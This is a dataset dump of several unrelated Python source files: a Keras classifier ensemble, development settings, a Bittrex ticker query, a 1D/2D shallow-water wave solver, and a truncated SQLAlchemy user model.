text stringlengths 38 1.54M |
|---|
import tensorflowjs as tfjs
import pandas as pd
from keras.models import load_model
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from keras.preprocessing.text import *
from keras.utils import to_categorical
from keras.models import Model
from keras.layers import Input, Average
from Data_proc import text2seq, text2matrix, MAX_WORD, Y_CLASS, TRAINING_PATH, MAX_LEN
X_trainA, X_testA, Y_trainA, Y_testA = text2seq()
X_trainB, X_testB, Y_trainB, Y_testB = text2matrix()
EMB = tfjs.converters.load_keras_model('./1D_YoonKim_Model/model.json')
EMB.save('1D_YoonKim_Model_hyp.h5')
EMB_MODEL = load_model('1D_YoonKim_Model_hyp.h5')
BOW = tfjs.converters.load_keras_model('./DNN_NE_HypOpt/model.json')
BOW.save('DNN_NE_hyp.h5')
BOW_MODEL = load_model('DNN_NE_hyp.h5')
CBOW = tfjs.converters.load_keras_model('./Transfer_CBOW_DNN/model.json')
CBOW.save('Transfer_CBOW_DNN_hyp.h5')
CBOW_MODEL = load_model('Transfer_CBOW_DNN_hyp.h5')
EMB_MODEL.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
BOW_MODEL.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
CBOW_MODEL.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
def ensemble():
global BOW_MODEL, EMB_MODEL, CBOW_MODEL
inputA = Input(shape=(MAX_LEN,))
inputB = Input(shape=(MAX_WORD,))
#average = CBOW_MODEL(inputA)
# ALL
# average = Average()([EMB_MODEL(inputA), CBOW_MODEL(inputA), BOW_MODEL(inputB)])
# EMB, CBOW
# average = Average()([EMB_MODEL(inputA), CBOW_MODEL(inputA)])
# EMB, BOW
# average = Average()([EMB_MODEL(inputA), BOW_MODEL(inputB)])
# CBOW, BOW
average = Average()([CBOW_MODEL(inputA), BOW_MODEL(inputB)])
model = Model(inputs=[inputA, inputB], outputs=average)
return model
model_ensemble = ensemble()
model_ensemble.summary()
model_ensemble.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
score = model_ensemble.evaluate([X_testA, X_testB], Y_testA)
print('Test loss: ', score[0])
print('Test Accuracy: ', score[1])
|
from base import *
DEBUG = True
SITE_URL = 'http://localhost:8000/'
MEDIA_URL = 'http://localhost:8000/site_media/'
CACHE_BACKEND = 'dummy://' |
from bitex import Bittrex
k = Bittrex(key_file='bittrex.key')
r = k.ticker('BTC-BTS')
import pprint
print((r.formatted))
print((r.json()))
|
# ----------module for core solver functions
import numpy as np
import SWIC_IO_module as IO # input-output module
import sys
from statistics import mode
import scipy.sparse
import scipy.sparse.linalg
def fill_zeros_with_last(arr): #fills zeros with last non_zero value
prev = np.arange(len(arr))
prev[arr == 0] = 0
prev = np.maximum.accumulate(prev)
return arr[prev]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#---------------------------------Initializing computatonal grid variables-------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def intialize_Cgrid(inpt):
if inpt['mode'] == '1D':
nx = int(IO.inpt['Lx']/IO.inpt['del_x'])+1 # number of points in X
d = np.zeros((nx)) # depth
h_flow = np.zeros((nx+1)) # h at cell edges water height
#current time step
elv_cu = np.zeros((nx)) # elevtation at current time step
U_cu = np.zeros((nx+1)) # flux in X at current time step
# previous time step
elv_pr = np.zeros((nx)) # elevtation at previous time step
U_pr = np.zeros((nx+1)) # flux in X at previous time step
## assigning flags for trakcing breaking and dry-wet condtions
wave_break = np.zeros((nx)) # wave breaking flag of the cell
wet = np.zeros((nx)) # flag for dry-wet status of the cell
#initiating velocity array
U = np.zeros((nx+1))
#X-co-ordinates
X = np.zeros((nx))
X[0] = IO.inpt['start_x']
for i in range(1,nx):
X[i] = X[i-1] + IO.inpt['del_x']
#if constant manning is choosen populate manning value
Cf = np.ones((nx))
return [nx,X,d,h_flow,elv_cu,U_cu,elv_pr,U_pr,wave_break,wet,Cf]
elif inpt['mode'] == '2D':
nx = int(IO.inpt['Lx']/IO.inpt['del_x']) +1# number of points in X
ny = int(IO.inpt['Ly']/IO.inpt['del_y']) +1# number of points in y
d = np.zeros((nx,ny)) # depth
h_flow_x = np.zeros((nx+1,ny)) # h at cell edges water height
h_flow_y = np.zeros((nx,ny+1)) # h at cell edges water height
#current time step
elv_cu = np.zeros((nx,ny)) # elevtation at current time step
U_cu = np.zeros((nx+1,ny)) # flux in X at current time step
V_cu = np.zeros((nx,ny+1)) # flux in Y at current time step
# previous time step
elv_pr = np.zeros((nx,ny)) # elevtation at previous time step
U_pr = np.zeros((nx+1,ny)) # flux in X at previous time step
V_pr = np.zeros((nx,ny+1)) # flux in Y at previous time step
## assigning flags for trakcing breaking and dry-wet condtions
wave_break = np.zeros((nx,ny)) # wave breaking flag of the cell
wet = np.zeros((nx,ny)) # flag for dry-wet status of the cell
#initiating velocity array
U = np.zeros((nx+1,ny))
V = np.zeros((nx,ny+1))
#X-co-ordinates
X = np.zeros((nx,ny))
for j in range(0,ny):
X[0,j] = IO.inpt['start_x']
for i in range(1,nx):
X[i,j] = X[i-1,j] + IO.inpt['del_x']
#Y-co-ordinates
Y = np.zeros((nx,ny))
for i in range(0,nx):
Y[i,0] = IO.inpt['start_y']
for j in range(1,ny):
Y[i,j] = Y[i,j-1] + IO.inpt['del_y']
Cf = np.ones((nx,ny))
return [nx,ny,X,Y,d,h_flow_x,h_flow_y,elv_cu,U_cu,V_cu,elv_pr,U_pr,V_pr,wave_break,wet,Cf]
def intial_set_elvetaions_n_heights(d,elv,wet,h_flow,mode,h_flow_y = []):
if mode == '1D':
nx = len(h_flow)
for i in range(0,nx-1):
if d[i] <=0:
elv[i] = 0
else:
elv[i] = d[i]
h_flow[0] = elv[0] - d[0]
h_flow[nx-1] = elv[-1] - d[-1]
for i in range(1,nx-1):
if IO.inpt['Z_opt'] == 'mean': #mean scheme
h_flow[i] = (np.sum(elv[i:i+2]) - np.sum(d[i:i+2]))/2
elif IO.inpt['Z_opt'] == 'max': #max scheme
h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
# update wet-dry cell flags in the first calculation
if np.any(wet == 0):
wet[ np.where(h_flow[0:len(h_flow)-1] >= IO.inpt['depth_threshold'])] = 1 #where depth > threshold flag the cell as wet
return [h_flow,elv,wet]
elif mode == '2D':
nx = np.size(d, 0)
ny = np.size(d, 1)
for j in range(0,ny):
for i in range(0,nx):
if d[i,j] <=0:
elv[i,j] = 0
else:
elv[i,j] = d[i,j]
nx = np.size(h_flow, 0)
ny = np.size(h_flow, 1)
h_flow[0,:] = elv[0,:] - d[0,:]
h_flow[nx-1,:] = elv[-1,:] - d[-1,:]
for j in range(0,ny):
for i in range(1,nx-1):
if IO.inpt['Z_opt'] == 'mean': #mean scheme
h_flow[i,j] = (np.sum(elv[i:i+2,j]) - np.sum(d[i:i+2,j]))/2
elif IO.inpt['Z_opt'] == 'max': #max scheme
h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
nx = np.size(h_flow_y, 0)
ny = np.size(h_flow_y, 1)
h_flow_y[:,0] = elv[:,0] - d[:,0]
h_flow_y[:,ny-1] = elv[:,-1] - d[:,-1]
for i in range(0,nx):
for j in range(1,ny-1):
if IO.inpt['Z_opt'] == 'mean': #mean scheme
h_flow_y[i,j] = (np.sum(elv[i,j:j+2]) - np.sum(d[i,j:j+2]))/2
elif IO.inpt['Z_opt'] == 'max': #max scheme
h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
# update wet-dry cell flags in the first calculation
wet[ np.where(h_flow[0:-1] >= IO.inpt['depth_threshold'])] = 1 #where depth > threshold flag the cell as wet
return [h_flow,h_flow_y,elv,wet]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#-------------------------------------------Ramp function------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def ramp(t,TP):
ramp_time = TP
if t < ramp_time:
ramp = 0.5 * (1 - np.cos((2 * np.pi /TP )* (t/2)))
else:
ramp = 1
return ramp
def Zeta_plus(t):
if IO.inpt['w_type'] == 'Linear':
elv_plus = IO.inpt['amp'] * np.sin(t *2* np.pi * IO.inpt['f'] ) #incoming wave elevtion
ret_val = elv_plus * ramp(t,IO.inpt['TP']) #apply a ramp function
return ret_val
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#-------------------------------------------drying algorithm------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def Drying_algorithm(h_flow,wet,elv,d,U_cu,mode,h_flow_y = [],V_cu = []):
if mode == '1D':
nx = len(elv)
for i in range(1,nx):
if h_flow[i] < IO.inpt['depth_threshold']/2: #for hysteris
elv[i] = d[i]
h_flow[i] = elv[i] - d[i]
U_cu[i] = 0
wet[i] = 0
return [h_flow,elv,wet,U_cu]
elif mode == '2D':
nx = np.size(elv,0)
ny = np.size(elv,1)
for i in range(0,nx):
for j in range(0,ny):
if ((h_flow[i,j] + h_flow[i+1,j] + h_flow_y[i,j] + h_flow_y[i,j+1]) /4) < IO.inpt['depth_threshold']/2: #for hysteris
elv[i,j] = d[i,j]
h_flow[i,j] = elv[i,j] - d[i,j]
h_flow_y[i,j] = elv[i,j] - d[i,j]
h_flow_y[i,j+1] = elv[i,j] - d[i,j]
U_cu[i,j] = 0
V_cu[i,j] = 0
V_cu[i,j+1] = 0
wet[i,j] = 0
return [h_flow,h_flow_y,elv,wet,U_cu,V_cu]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#---------------------------------computing water depth grid -----------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
## h_flow calculation -- h at cell edges (water height h = zeta - d)
def set_water_height(d,elv,wet,h_flow,U_cu,mode,h_flow_y = [],V_cu = []):
if mode == '1D':
nx = len(h_flow)
h_flow[0] = elv[0] - d[0]
h_flow[nx-1] = h_flow[nx-2]
for i in range(1,nx-1):
if IO.inpt['Z_opt'] == 'mean': #mean scheme
h_flow[i] = (np.sum(elv[i:i+2]) - np.sum(d[i:i+2]))/2
elif IO.inpt['Z_opt'] == 'max': #max scheme
h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
if U_cu[i] > 0:
h_flow[i] = elv[i-1] - d[i-1]
elif U_cu[i] < 0:
h_flow[i] = elv[i] - d[i]
elif U_cu[i] == 0:
h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
[h_flow,elv,wet,U_cu] = Drying_algorithm(h_flow,wet,elv,d,U_cu,mode)
return [h_flow,elv,wet,U_cu]
elif mode == '2D':
nx = np.size(h_flow, 0)
ny = np.size(h_flow, 1)
h_flow[0,:] = elv[0,:] - d[0,:]
h_flow[nx-1,:] = elv[-1,:] - d[-1,:]
for j in range(0,ny):
for i in range(1,nx-1):
if IO.inpt['Z_opt'] == 'mean': #mean scheme
h_flow[i,j] = (np.sum(elv[i:i+2,j]) - np.sum(d[i:i+2,j]))/2
elif IO.inpt['Z_opt'] == 'max': #max scheme
h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
nx = np.size(h_flow_y, 0)
ny = np.size(h_flow_y, 1)
h_flow_y[:,0] = elv[:,0] - d[:,0]
h_flow_y[:,ny-1] = elv[:,-1] - d[:,-1]
for i in range(0,nx):
for j in range(1,ny-1):
if IO.inpt['Z_opt'] == 'mean': #mean scheme
h_flow_y[i,j] = (np.sum(elv[i,j:j+2]) - np.sum(d[i,j:j+2]))/2
elif IO.inpt['Z_opt'] == 'max': #max scheme
h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
[h_flow,h_flow_y,elv,wet,U_cu,V_cu] = Drying_algorithm(h_flow,wet,elv,d,U_cu,mode,h_flow_y,V_cu)
return [h_flow,h_flow_y,elv,wet,U_cu,V_cu]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#----------------------------------Flooding algorithm----------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def check_flooding(wet,U_cu,d,h_flow,elv_cu,mode,h_flow_y = [],V_cu = []):
## FLOODING algortihm
if np.any(wet==0):
if mode == '1D':
# assuming 1 cell at a time gets flooded
i_flood = np.where(wet == 0)[0][0] #first dry cel
dry_cell_flux = U_cu[i_flood-1] #flux in cell before it
if dry_cell_flux > 0: #given positive flow towards the dry cell
# yamazaki method
new_depth = elv_cu[i_flood-1] - d[i_flood] #check the expected depth
if new_depth >= IO.inpt['depth_threshold']: #if the expected depth is greater than the thrshold
h_flow[i_flood] = new_depth # assign the expected water depth
U_cu[i_flood] = U_cu[i_flood -1] # assign +ve flux
wet[i_flood] = 1 # assign wet status
return [wet,U_cu,h_flow,elv_cu]
elif mode == '2D':
# assuming 1 cell at a time gets flooded
wet_bool = (wet[1::] == 0) * (wet[0:-1] == 1)
i_flood = np.where(wet_bool == True)#first dry cell
Xs = np.array(i_flood[0])+1
Ys = np.array(i_flood[1])
edges = np.where( Ys == np.size(wet,1)-1 )[0]
Xs = np.delete(Xs,edges)
Ys = np.delete(Ys,edges)
multplier = np.array([0,0])
for i in range(0,len(Xs)):
dry_cell_flux = U_cu[Xs[i]-1,Ys[i]] #flux in cell before it
x_flooding = 0
if dry_cell_flux > 0 and (wet[Xs[i],Ys[i]-1] == 0 or wet[Xs[i],Ys[i]+1] == 0) : #given positive flow towards the dry cell
# yamazaki method
new_depth = elv_cu[Xs[i]-1,Ys[i]] - d[Xs[i]-1,Ys[i]] #check the expected depth
if new_depth >= IO.inpt['depth_threshold']: #if the expected depth is greater than the thrshold
h_flow[Xs[i],Ys[i]] = new_depth # assign the expected water depth
h_flow_y[Xs[i],Ys[i]+1] = new_depth # assign the expected water depth
h_flow_y[Xs[i],Ys[i]] = new_depth # assign the expected water depth
U_cu[Xs[i],Ys[i]] = U_cu[Xs[i]-1,Ys[i]] # assign +ve flux
V_cu[Xs[i],Ys[i]+1] = V_cu[Xs[i]-1,Ys[i]+1] # assign +ve flux
V_cu[Xs[i],Ys[i]] = V_cu[Xs[i]-1,Ys[i]] # assign +ve flux
wet[Xs[i],Ys[i]] = 1 # assign wet status
x_flooding = 1
elif (wet[Xs[i],Ys[i]-1] == 1 or wet[Xs[i],Ys[i]+1] == 1) :
if V_cu[Xs[i],Ys[i]-1] > 0:
multplier[0] = 1
elif V_cu[Xs[i],Ys[i]+2] < 0:
multplier[1] = 1
if x_flooding:
new_depth = (elv_cu[Xs[i]-1,Ys[i]] + multplier[0] * V_cu[Xs[i],Ys[i]-1] + multplier[1] * V_cu[Xs[i],Ys[i]+2])/(1 + np.sum(multplier)) - d[Xs[i]-1,Ys[i]] #check the expected depth
else:
new_depth = ( multplier[0] * V_cu[Xs[i],Ys[i]-1] + multplier[1] * V_cu[Xs[i],Ys[i]+2])/np.sum(multplier) - d[Xs[i]-1,Ys[i]] #check the expected depth
U_cu[Xs[i],Ys[i]] = U_cu[Xs[i]-1,Ys[i]]
h_flow[Xs[i],Ys[i]] = h_flow[Xs[i]-1,Ys[i]]
V_cu[Xs[i],Ys[i]+1] = V_cu[Xs[i],Ys[i]+2] # assign +ve flux
V_cu[Xs[i],Ys[i]] = V_cu[Xs[i],Ys[i]-1] # assign +ve flux
wet[Xs[i],Ys[i]] = 1
return [wet,U_cu,h_flow,elv_cu,h_flow_y,V_cu]
else:
if mode == '1D':
return [wet,U_cu,h_flow,elv_cu]
elif mode == '2D':
return [wet,U_cu,h_flow,elv_cu,h_flow_y,V_cu]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#---------------------------------check error function to stop simulation which might not ---------------------
#----------------------------------raise python errors but the physics is unreasonable-------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def check_values(CFL,elv_pr):
if CFL > 0.75 or np.any(np.isnan(elv_pr)) or np.any(abs(elv_pr) > 20):
IO.write_log("This program is forcefully stopped as some values are abnormal or they will cause instabilies later on")
if CFL >0.75:
IO.write_log('CFL = %02f : must be less than 0.75 to ensure stability' %CFL)
elif np.any(np.isnan(elv_pr)) or np.any(abs(elv_pr) > 10**2):
IO.write_log('Abnormal values detected in wave elevation')
sys.exit()
def eddy_viscosity_model(nu_eddy,U,dx,mode,d,V = [],dy = []) :
Cs = 0.1;
if mode == '1D':
du = np.gradient(U) / dx
nu_eddy = Cs**2 * np.sqrt(3) * dx * abs(du[0:-1])
elif mode == '2D':
du = np.gradient(U,axis=0)/dx
dv = np.gradient(V,axis=1)/dy
nu_eddy = Cs**2 * np.sqrt(2) * dx * dy * np.sqrt(du[0:-1,:]**2 + dv[:,0:-1]**2 + 0.5 * (du[0:-1,:]+dv[:,0:-1])**2)
return nu_eddy
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#------------------------------------checking the onset of breaking--------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def check_onset_of_breaking(d,U,elv_cu,wave_break,h_flow,X,wet,gamma):
wave_break = np.zeros(len(elv_cu)) #setting all flags to zero for re evaluation
#checking differnt breaking criterion
for i in range(0,len(elv_cu)):
if h_flow[i] > 0.5:
# wave steepness
if abs(elv_cu[i])*2 >= 0.8 * abs(d[i]):
wave_break[i] = 1
break
# wave celerity:
elif abs(U[i]) > np.sqrt(IO.inpt['g'] * abs(d[i])):
wave_break[i] = 1
break
# new wave parameter
elif abs(U[i]) > 0.8* np.sqrt(IO.inpt['g'] * abs(d[i])):
wave_break[i] = 1
break
elif abs(elv_cu[i])*2 >= gamma[i]* abs(d[i]):
wave_break[i] = 1
break
wave_break = fill_zeros_with_last(wave_break) #makes sure the wave is dissipated along
#the whole wave just the crest from onset of breaking
return [wave_break]
def check_onset_of_breaking_2D(d,U,elv_cu,wave_break,h_flow_x,X,wet):
nx = np.size(d,0)
ny = np.size(d,1)
wave_break = np.zeros((nx,ny))
for j in range(0,ny):
[wave_break[:,j]] = check_onset_of_breaking(d[:,j],U[:,j],elv_cu[:,j],wave_break[:,j],h_flow_x[:,j],X[:,j],wet[:,j])
return wave_break
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#------------------------------------solver functions--------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def Solve_1D_elevation(elv_cu,elv_pr,U_pr,wet,del_t,h_flow): #solver for elevation
nx = len(elv_cu)
elv_cu = np.zeros((nx))
for i in range(0,nx):
if wet[i] == 1:
elv_cu[i] = elv_pr[i] - (del_t * (U_pr[i+1]*h_flow[i+1] - U_pr[i]*h_flow[i])/IO.inpt['del_x'])
return elv_cu
def make_flux_n_cel_vel(U_pr,h_flow):
FLU_p = np.zeros((len(U_pr)))
FLU_n = np.zeros((len(U_pr)))
U_p = np.zeros((len(U_pr)))
U_n = np.zeros((len(U_pr)))
nx = len(U_pr)
for i in range(0,nx):
if i == 1 or i == nx-1:
FLU_p[i] = U_pr[i] * h_flow[i]
FLU_n[i] = U_pr[i] * h_flow[i]
U_p[i] = FLU_p[i]/h_flow[i]
U_n[i] = FLU_n[i]/h_flow[i]
else:
if U_pr[i-1] >0:
if i >1:
FLU_p[i] = (U_pr[i] + U_pr[i-1])*0.5*0.5*(h_flow[i-1]+h_flow[1-2])
else:
FLU_p[i] = (U_pr[i] + U_pr[i-1])*0.5*h_flow[i-1]
elif U_pr[i-1] <= 0 :
FLU_p[i] = (U_pr[i] + U_pr[i-1])*0.5*h_flow[i-1]
if U_pr[i+1] >0:
FLU_p[i] = (U_pr[i] + U_pr[i+1])*0.5*0.5*(h_flow[i]+h_flow[1+1])
elif U_pr[i-1] <= 0 :
FLU_p[i] = (U_pr[i] + U_pr[i+1])*0.5*h_flow[i]
U_p[i] = 2*FLU_p[i]/(h_flow[i] +h_flow[i-1])
U_n[i] = 2*FLU_n[i]/(h_flow[i] +h_flow[i-1])
U_p = 0.5*(U_p + abs(U_p))
U_n = 0.5*(U_n - abs(U_n))
return [U_p,U_n]
def make_flux_n_cel_vel2(U,h_flow):
flux = 0.5*(U[0:-1]*h_flow[0:-1] + U[1:]*h_flow[1:])
cell_vel = 0.5*(U[0:-1] + U[1:])
return [flux,cell_vel]
def Solve_1D_Hs_velocities(U_cu,elv_pr,U_pr,h_flow,d,wet,del_t,wave_break,nu_eddy,Cf,adv): #hydrostatic flux solver
nx = len(U_pr)
#[U_p,U_n] = make_flux_n_cel_vel(U_pr,h_flow)
[flux,cell_vel] = make_flux_n_cel_vel2(U_pr,h_flow)
for i in range(1,nx-1): #neglect inlfow
if wet[i]:
if adv[i] == 1:
advection = (1/h_flow[i])*(flux[i]*cell_vel[i] - flux[i-1]*cell_vel[i-1])/IO.inpt['del_x'] - (U_pr[i]/h_flow[i])*(flux[i] - flux[i-1])/IO.inpt['del_x']
#advection = U_p[i]*(U_pr[i] - U_pr[i-1])/IO.inpt['del_x'] + U_n[i]*(U_pr[i+1] - U_pr[i])/IO.inpt['del_x']
weighted_flux = (IO.inpt['flux_weight'] * U_pr[i]) + ((1 - IO.inpt['flux_weight'])* (U_pr[i-1] + U_pr[i+1])/2)
viscous_term = 0
if wave_break[i] :
viscous_term = del_t * (nu_eddy[i+1] *(U_pr[i+1] - U_pr[i]) - nu_eddy[i] *(U_pr[i] - U_pr[i-1]))/(h_flow[i] * IO.inpt['del_x']**2)
numerator = weighted_flux - del_t*advection - (IO.inpt['g'] * del_t* (elv_pr[i] - elv_pr[i-1])/IO.inpt['del_x']) + viscous_term
denominator = 1 + ( del_t * Cf[i] * abs(U_pr[i]) / (h_flow[i])) #
U_cu[i] = numerator/denominator
else:
weighted_flux = (IO.inpt['flux_weight'] * U_pr[i]) + ((1 - IO.inpt['flux_weight'])* (U_pr[i-1] + U_pr[i+1])/2)
viscous_term = 0
if wave_break[i] :
viscous_term = del_t * (nu_eddy[i+1] *(U_pr[i+1] - U_pr[i]) - nu_eddy[i] *(U_pr[i] - U_pr[i-1]))/(h_flow[i] * IO.inpt['del_x']**2)
numerator = weighted_flux - (IO.inpt['g'] * del_t* (elv_pr[i] - elv_pr[i-1])/IO.inpt['del_x']) + viscous_term
denominator = 1 + ( del_t * Cf[i] * abs(U_pr[i]) / (h_flow[i]))
U_cu[i] = numerator/denominator
return U_cu
def TDMA(a,b,c,d):
n = len(d)
w= np.zeros(n-1,float)
g= np.zeros(n, float)
p = np.zeros(n,float)
w[0] = c[0]/b[0]
g[0] = d[0]/b[0]
for i in range(1,n-1):
w[i] = c[i]/(b[i] - a[i-1]*w[i-1])
for i in range(1,n):
g[i] = (d[i] - a[i-1]*g[i-1])/(b[i] - a[i-1]*w[i-1])
p[n-1] = g[n-1]
for i in range(n-1,0,-1):
p[i-1] = g[i-1] - w[i-1]*p[i]
return p
def Solve_1D_NHs_velocities(U_cu,elv_pr,U_pr,h_flow,d,wet,del_t,wave_break,nu_eddy,Cf,P_nh_cu,P_nh_pr,W_cu,W_pr,bot_grad,W_b_pr,W_b_cu,adv): #non-hydrostatic flux solver
P_nh_cu = np.zeros((len(elv_pr)))
W_cu = np.zeros((len(elv_pr)))
W_b_cu = np.zeros((len(elv_pr)))
U_cu_half = np.zeros(len(U_cu))
U_cu_half[0] = U_cu[0]
U_cu_half = Solve_1D_Hs_velocities(U_cu,elv_pr,U_pr,h_flow,d,wet,del_t,wave_break,nu_eddy,Cf,adv)
## calculate W_cu
nx = len(d)
for i in range(0,nx):
if wet[i] :
if i == 0:
W_b_cu[i] = - U_cu_half[i]*bot_grad[i]
else:
W_b_cu[i] = - 0.5*(U_cu_half[i]+abs(U_cu_half[i]))*bot_grad[i] - 0.5*(U_cu_half[i]-abs(U_cu_half[i]))*bot_grad[i-1]
if np.any(bot_grad != 0):
nx_cut = min([np.where(d >= IO.inpt['bifur_depth'])[0][0], np.where(wet == 0)[0][0]]) -1# min([np.where(d >= -2)[0][0], np.where(wet == 0)[0][0]])
else:
nx_cut = nx-1
if np.any(wave_break == 1):
if np.where(wave_break == 1)[0][0] < nx_cut:
nx_cut = np.where(wave_break == 1)[0][0]
A_fac = (np.gradient(elv_pr[0:nx_cut+1]) - bot_grad[0:nx_cut+1])/h_flow[0:nx_cut+1]
A = np.eye((nx_cut))#tridaigonal matrix
B = np.zeros((nx_cut)) #sytem of equations AX=B
f1 = del_t/(2*(IO.inpt['del_x']**2))
a = np.zeros((nx_cut))
b = np.ones((nx_cut))
c = np.zeros((nx_cut))
# a[0:nx_cut] = f1*(-1 + A_fac[0:nx_cut])
# b[0:nx_cut] = f1*(2 + A_fac[0:nx_cut] -A_fac[1:nx_cut+1]) + 2*del_t/(0.5*(h_flow[0:nx_cut]+h_flow[1:nx_cut+1]))**2
# c[0:nx_cut] = f1*(-1 - A_fac[0:nx_cut])
for i in range(0,nx_cut):
a[i] = f1*(-1 + A_fac[i])
b[i] = f1*(2 + A_fac[i] -A_fac[i+1]) + 2*del_t/(0.5*(h_flow[i]+h_flow[i+1]))**2
c[i] = f1*(-1 - A_fac[i+1])
A[i,i] = f1*(2 + A_fac[i] -A_fac[i+1]) + 2*del_t/(0.5*(h_flow[i]+h_flow[i+1]))**2
if i != 0:
A[i,i-1] = f1*(-1 + A_fac[i])
if i != nx_cut-1:
A[i,i+1] = f1*(-1 - A_fac[i])
B[i] = - (U_cu_half[i+1] - U_cu_half[i])/IO.inpt['del_x'] - 2*(W_pr[i] + W_b_pr[i] - 2*W_b_cu[i])/(h_flow[i]+h_flow[i+1])
## solve P_nh_cu
M2 = scipy.sparse.linalg.spilu(A)
M = scipy.sparse.linalg.LinearOperator((nx_cut,nx_cut), M2.solve)
P_nh_cu[0:nx_cut], exitCode = scipy.sparse.linalg.bicgstab(A, B,M=M,tol=10**-8)
#P_nh_cu = np.linalg.inv(A).dot(B)
#P_nh_cu[0:nx_cut] = TDMA(a,b,c,B)
nx = len(U_cu)
for i in range(1,nx_cut+1): #neglect inlfow
pressure_term = 0.5*(P_nh_cu[i] - P_nh_cu[i-1])/IO.inpt['del_x'] + 0.5*((P_nh_cu[i]+P_nh_cu[i-1])*(elv_pr[i] - elv_pr[i-1] - d[i] + d[i-1])/( (h_flow[i]+h_flow[i+1]) *IO.inpt['del_x']))
U_cu[i] = U_cu_half[i] - pressure_term * del_t
U_cu[nx_cut+1:] = U_cu_half[nx_cut+1:]
nx = len(d)
for i in range(0,nx):
if wet[i] :
W_cu[i] = W_pr[i] - (W_b_cu[i] - W_b_pr[i]) + 2*del_t*P_nh_cu[i]/h_flow[i]
return [U_cu,P_nh_cu,W_cu,W_b_cu]
|
# coding: utf-8
import json
from datetime import datetime, date
from werkzeug.security import generate_password_hash, check_password_hash
from ._base import db
from ._helpers import pinyin, save_object_to_es, delete_object_from_es, search_objects_from_es
class User(db.Model):
"""用户"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(200), unique=True)
name_pinyin = db.Column(db.String(200))
name_edit_count = db.Column(db.Integer, default=2) # 剩余的称呼修改次数
email = db.Column(db.String(100), unique=True)
inactive_email = db.Column(db.String(100))
desc = db.Column(db.String(200), )
avatar = db.Column(db.String(200), default='default_user_avatar.png')
background = db.Column(db.String(200))
password = db.Column(db.String(200))
url_token = db.Column(db.String(100))
location = db.Column(db.String(100))
organization = db.Column(db.String(100))
position = db.Column(db.String(200))
created_at = db.Column(db.DateTime, default=datetime.now)
last_read_compose_feeds_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览撰写 FEED 的时间
last_read_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览通知的时间
last_read_message_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览消息类通知的时间
